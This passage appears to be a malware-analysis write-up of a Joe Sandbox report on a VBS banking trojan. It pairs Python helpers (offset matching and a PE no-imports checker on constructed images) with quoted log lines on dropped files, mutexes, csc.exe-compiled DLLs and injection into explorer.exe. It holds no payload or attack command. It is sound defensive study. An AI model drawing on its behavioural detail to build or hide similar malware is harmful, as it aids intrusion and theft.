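if __name__ == "__main__":
    r = shared_module_report(parse_code_functions(REPORT_LINES), 28, 31)
    print(f"delta 0x{r['delta']:08X}: {r['matched']}/{r['total_a']} control.exe "
          f"functions reappear in explorer.exe; {len(r['only_in_b'])} explorer.exe "
          f"functions have no counterpart")
```

Run over the complete list on this page, all 19 control.exe functions map onto explorer.exe functions with a delta of 0x04210000, and the remaining 25 explorer.exe entries have no counterpart in control.exe. The delta is a multiple of 0x10000, consistent with two 64 KiB-aligned allocations (0x00BD0000 and 0x04DE0000 are plausible bases, but the report does not state them; that is an assumption). A clean delta like this is strong evidence that the sandbox is describing the same injected module twice rather than two distinct payloads.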
            Source: Joe Sandbox View   Dropped File: C:\Users\user\AppData\Local\Temp\earmark.avchd 66EAF5C2BC2EC2A01D74DB9CC50744C748388CD9B0FA1F07181E639E128803EF
            Source: 6znkPyTAVN7V.vbs   Initial sample: Strings found which are bigger than 50
            Source: dvgqxizg.dll.29.dr   Static PE information: No import functions for PE file found
            Source: 41myt1z4.dll.26.dr   Static PE information: No import functions for PE file found
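Both DLLs produced by the csc.exe runs are flagged for having no import functions. That is cheap to confirm offline without a PE library: the import directory is entry 1 of the optional header's data directory, and a zero RVA or size means the loader resolves nothing for the module, so any Win32 API it uses has to be resolved by the code itself at run time, or by the CLR in the case of a managed assembly. The following checker is an added example, not code from the report or from Joe Sandbox; the PE images it builds are constructed, header-only samples, not the dropped files.

```python
import struct

IMAGE_DIRECTORY_ENTRY_IMPORT = 1  # index of the import directory entry


def build_minimal_pe(import_rva, import_size, pe32plus=True):
    """Construct a header-only PE image (no sections) with the given import
    directory entry. Constructed test input, not a real binary."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\x00" * (0x3C - 2) + struct.pack("<I", e_lfanew)      # 64-byte DOS header
    opt_size = 240 if pe32plus else 224                                     # optional header size
    coff = struct.pack("<HHIIIHH", 0x8664 if pe32plus else 0x14C,           # Machine
                       0, 0, 0, 0, opt_size, 0x2022)                        # ..., Characteristics: DLL
    if pe32plus:
        head = struct.pack("<HBBIIIIIQ", 0x20B, 0, 0, 0, 0, 0, 0, 0, 0x180000000)   # through ImageBase
    else:
        head = struct.pack("<HBBIIIIIII", 0x10B, 0, 0, 0, 0, 0, 0, 0, 0, 0x10000000)
    # SectionAlignment .. DllCharacteristics (40 bytes, same layout in both formats)
    mid = struct.pack("<IIHHHHHHIIIIHH", 0x1000, 0x200, 6, 0, 0, 0, 6, 0, 0,
                      0x1000, 0x200, 0, 2, 0x160)
    # stack/heap reserve+commit, LoaderFlags, NumberOfRvaAndSizes = 16
    tail = struct.pack("<QQQQII" if pe32plus else "<IIIIII",
                       0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    dirs = bytearray(16 * 8)
    struct.pack_into("<II", dirs, IMAGE_DIRECTORY_ENTRY_IMPORT * 8, import_rva, import_size)
    return dos + b"PE\0\0" + coff + head + mid + tail + bytes(dirs)


def import_directory(data):
    """Return (rva, size) of the import directory; raise ValueError for a non-PE."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    opt = e_lfanew + 24                       # optional header follows the 20-byte COFF header
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == 0x10B:                        # PE32: directories start at offset 96
        num_rva_off, dir_off = opt + 92, opt + 96
    elif magic == 0x20B:                      # PE32+: directories start at offset 112
        num_rva_off, dir_off = opt + 108, opt + 112
    else:
        raise ValueError(f"unknown optional header magic 0x{magic:X}")
    num_rva = struct.unpack_from("<I", data, num_rva_off)[0]
    if num_rva <= IMAGE_DIRECTORY_ENTRY_IMPORT:
        return 0, 0                           # directory table too short to hold an import entry
    return struct.unpack_from("<II", data, dir_off + IMAGE_DIRECTORY_ENTRY_IMPORT * 8)


def has_no_imports(data):
    """True when the image carries no import directory (the condition the sandbox
    flags). A present but empty descriptor list is not examined here."""
    rva, size = import_directory(data)
    return rva == 0 or size == 0


if __name__ == "__main__":
    for label, sample in (("no imports", build_minimal_pe(0, 0)),
                          ("with imports", build_minimal_pe(0x2000, 0x28))):
        print(f"{label}: import directory {import_directory(sample)}, "
              f"flagged={has_no_imports(sample)}")
```

To check a dropped file, pass `open(path, "rb").read()` to `has_no_imports`. Treat a hit as a triage signal rather than proof: a packed or hand-built loader deliberately leaves the import directory empty and resolves APIs by hashing exports at run time, while a managed assembly may legitimately carry few or no native imports, so pair this check with the dynamic findings the report already gives.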
            Source: C:\Windows\System32\mshta.exe   Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
            Source: C:\Windows\explorer.exe   Section loaded: cryptdlg.dll
            Source: C:\Windows\explorer.exe   Section loaded: msoert2.dll
            Source: C:\Windows\explorer.exe   Section loaded: msimg32.dll
            Source: classification engine   Classification label: mal100.bank.troj.spyw.evad.winVBS@28/41@11/2
            Source: C:\Program Files\internet explorer\iexplore.exe   File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{051BC4BB-2B60-11EB-90E5-ECF4BB2D2496}.dat
            Source: C:\Windows\System32\conhost.exe   Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5288:120:WilError_01
            Source: C:\Windows\System32\conhost.exe   Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2916:120:WilError_01
            Source: C:\Windows\System32\control.exe   Mutant created: \Sessions\1\BaseNamedObjects\{CE3E3C9F-D537-30A7-CFE2-D96473361DD8}
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Mutant created: \Sessions\1\BaseNamedObjects\{5681524C-BDC8-F872-F7EA-41AC1BBE05A0}
            Source: C:\Windows\System32\wscript.exe   File created: C:\Users\user\AppData\Local\Temp\adobe.url
            Source: unknown   Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\6znkPyTAVN7V.vbs'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe   Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe   Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe   Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll